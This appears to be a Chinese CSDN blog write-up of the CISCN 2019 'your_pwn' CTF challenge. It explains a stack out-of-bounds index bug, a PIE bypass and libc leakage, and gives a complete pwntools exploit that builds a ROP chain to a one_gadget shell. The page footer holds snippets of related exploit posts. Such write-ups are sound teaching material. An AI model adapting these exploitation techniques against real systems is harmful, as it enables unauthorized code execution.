【PWN】2019-ciscn your——pwn

最新推荐文章于 2022-03-11 16:29:42 发布
最新推荐文章于 2022-03-11 16:29:42 发布
阅读量863 收藏 2
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41706924/article/details/89855954
版权

这题的漏洞点就在数组下标越界,造成栈上任意地址读写。

在做的时候遇到的坑点:

1.在于数组类型转换输出会造成误导:

如图:在栈上的十六进制数会先视为char类型,对不可见字符类型转换成int类型会变成负数,导致输出的十六进制最后俩位才是栈上的数值。

2.对不给libc.so的题可以用libcsearch和onegadget配合得到onegadget地址,因为我直接调用system函数会出现段错误,应该是在对栈上数据进行操作覆盖了环境变量???但是用onegadget就成功getshelll。

from LibcSearcher import *

#第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型
obj = LibcSearcher("fgets", 0X7ff39014bd90)

obj.dump("system")        #system 偏移
obj.dump("str_bin_sh")    #/bin/sh 偏移
obj.dump("__libc_start_main_ret")
配合方法:1.泄露一个函数地址,libcsearch可以得到libc的版本,用onegadget在libc的db文件夹里找到其.so文件

2.得到onegadget得知加上libcbase

3.pie绕过:

之前没做过带pie的题目,总结一下:直接泄露出返回地址,再在Ida里找到偏移相减就是pie的基址,pie会随机化程序加载基址,例如text段,data段,因此找到的plt地址,got地址程序本身的gadget都要加上pie基址(pie随机不会改变最低三位(4KB),即只随机内存页分配,但是在同一个内存页的偏移是不变的)

附上本菜鸡的exp:

from pwn import *
from LibcSearcher import *
sh = process('./pwn')
#sh = remote('39.97.228.196',60007)
context.log_level = 'debug'


popebp=0x000000000000099b

poprdi=0x0000000000000d03

sh.recvuntil('input your name \n')
sh.sendline('a')


ret =''
s=0
i=0
#gdb.attach(sh)
#leak pie_base
for i in range(41):
	sh.recvuntil('input index\n')
	sh.sendline(str(0x158+i))
	bc = sh.recvline()[-3:-1]
	if s<6:	
		addr= bc
		if ' ' in addr:
			addr=addr.strip()
			addr = addr + '0'
			ret = ret + addr
		else:
			addr = addr[::-1]
			ret = ret + addr
		s=s+1
	sh.recvuntil('input new value\n')
	sh.sendline(str(int(bc.strip(),16)))
ret = ret[::-1]
ret = int(ret,16)
log.success("%x",ret)
pie_base = ret - 0xb11

pop_rdi = 0xd03 + pie_base
puts_plt = 0x8b0 + pie_base
puts_got = 0x202020 + pie_base
vuln = 0x950 + pie_base
sh.recvuntil('do you want continue(yes/no)? \n')
sh.sendline('yes')
i=0
def write_addr(x,addr):
	j=0
	st = str(hex(addr))
	for i in range(6):
		sh.recvuntil('input index\n')
		sh.sendline(str(0x158+i+x))
		sh.recvuntil('input new value\n')
		L = 12-2*j
		K = 14-2*j
		abd = st[L:K]
		sh.sendline(str(int(abd,16)))
		j=j+1
log.success("pop_rdi : %x",pop_rdi)
write_addr(0,pop_rdi)
write_addr(8,puts_got)
write_addr(16,puts_plt)
write_addr(24,vuln)
for i in range(41-24):
	sh.recvuntil('input index\n')
	sh.sendline('0')
	sh.recvuntil('input new value\n')
	sh.sendline('1')
sh.recvuntil('do you want continue(yes/no)? \n')
sh.sendline('yes')
put_addr=u64(sh.recvline().strip().ljust(8,'\x00'))
log.success("put addr:%x",put_addr)

libc = LibcSearcher('puts',put_addr)


libc_base = put_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump("str_bin_sh")
sh.recvuntil('input your name \n')
sh.sendline('a')
one_gadget = 0x4f322+libc_base
write_addr(0,one_gadget)
write_addr(8,binsh)
write_addr(16,system_addr)
write_addr(24,vuln)
for i in range(41-24):
	sh.recvuntil('input index\n')
	sh.sendline(str(0+i))
	bc = sh.recvline()[-3:-1]
	sh.recvuntil('input new value\n')
	sh.sendline(str(int(bc.strip(),16)))
sh.recvuntil('do you want continue(yes/no)? \n')
#gdb.attach(sh)
sh.sendline('no')

sh.interactive()
sh.close()
Joaus
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn2019 pwn3
pondzhang的专栏
05-26 356
from pwn import * p = process("./ciscn_2019_n_3") elf = ELF('./ciscn_2019_n_3') def do_new_text(idx, lens, content): p.sendlineafter("CNote > ", '1') p.sendlineafter("Index > ", str(idx)) p.sendlineafter("Type > ", '2') p.sendlin
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
your_pwn
weixin_44319142的博客
05-04 610
your_pwn 溢出点在图的循环中,通过输入v1,可以任意打印栈上的内容,通过输入v2,可以实现向栈上写,每次只能写一个字节,即8bit。 通过漏洞打印出ret地址,得到代码段的基址,然后通过puts打印出puts_got,泄露出libc的地址,然后构造system("/bin/sh")的payload,然后getshell from pwn import * context.log_l...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
2019-CISCN华南赛区半决赛 pwn8
像初雪一样自由洒落
02-22 440
参考博客:https://xz.aliyun.com/t/5517#toc-3 学长给了这道题目,结合了逆向+pwn 64位的程序,是静态链接的,静态!可以直接构造rop链了 就开启了nx保护 执行的时候发现权限不够,直接给他加权限就可以,chmod +x easy_pwn 执行 emm,要把文件拖入桌面然后放入ida里面,因为桌面是C盘,有管理...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ciscn-2019-ne-3
最新发布
11-08
【标题】"ciscn-2019-ne-3" 指向的可能是一个网络安全竞赛或挑战,其中 "ciscn" 可能代表 China International Security Conference Network 或类似的网络安全活动,而 "2019-ne-3" 也许是该活动2019年中的第三个...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
2019CISCN华南赛区半决赛 pwn
qq_41071646的博客
12-09 837
好久没有练过pwn了,, 感觉自己pwn 都废了,, 近期打算刷一下攻防世界的android 然后 刷刷这个华南赛区的pwn。 如果刷的差不多 打算继续刷buuoj 。暂时把自己会的刷完。。 pwn1 这个题目真的很有意思 感觉出题人费心了 edit 函数已经给限制了 然后show 函数也限制了 edit 函数????️一个 off by null 由于没有开pie un...
pwnciscn_2019_s_4
Nothing
03-06 763
main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。 from pwn import * io=remote('node3.buuoj.cn',28060) leave=0x8048562 sys_plt=0x8048400 pl1='a'*0x24+'bbbb' io.send(pl1) io.recvuntil('bbbb') ebp=u32(...
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 365
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
[BUUCTF]PWN——ciscn_2019_s_9
BangSen1的博客
04-26 524
ciscn_2019_s_9 参考 例行检查 ,32位,未开启任何保护 运行一下。 32位ida载入,,第10行的fgets,能够溢出0x32-0x20-0x4个字节 没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode 生成的shellcode的长度过长,参数 s0x20(32) 写不下。 shellcode =''' xor eax,eax #eax置0 xor edx,edx #edx置0 push edx #将0入栈,标
pwnciscn_2019_final_3
Nothing
12-18 1693
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且题目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1109
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
2019国赛1.your_pwn
Jc
05-13 1281
1.文件属性
国赛your_pwn,PIE保护
playmaker的博客
05-13 1874
题目主要代码如下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s; // [rsp+0h] [rbp-110h] unsigned __int64 v5; // [rsp+108h] [rbp-8h] v5 = __readfsqword(0x28u); setbuf(stdout, 0LL);...
PWN|ciscn_2019_c_1
l2645470582_的博客
02-28 402
1.检查保护机制 (1)开启堆栈保护 (2)64位文件 2.用64位IDA打开该文件 (1)shift+f12查看关键字符串 没有看到后面函数(system等) (2)进入mian函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] BYREF init(argc, argv, envp); puts("EEEEEE...
2019_iscc_pwn350
Jc
05-26 497
引 1.这个道题有两个考察点 一个是ret2dl的了解(只要看过这个技术的,都知道哪里只需要拿过来使用就可以了)还有一个就是main函数末尾的堆栈平衡(自己在这里卡了好久) offset 相信解决的offset的大小,这道题有迎刃而解了(先补充一个知识点,对于新手) 1.第一个图是pwn350 第二个图是普通的main函数结尾处 2.IDA手动输入一下,会发现 ...
讲解一下pwn 2019第五空间
04-02
Pwn 2019第五空间是一场CTF比赛中的一道题目。该题目为二进制漏洞利用类题目,需要利用二进制程序中的漏洞进行攻击,获取程序的控制权。 该题目中提供了一个二进制文件,玩家需要对该文件进行分析,找出其中的漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值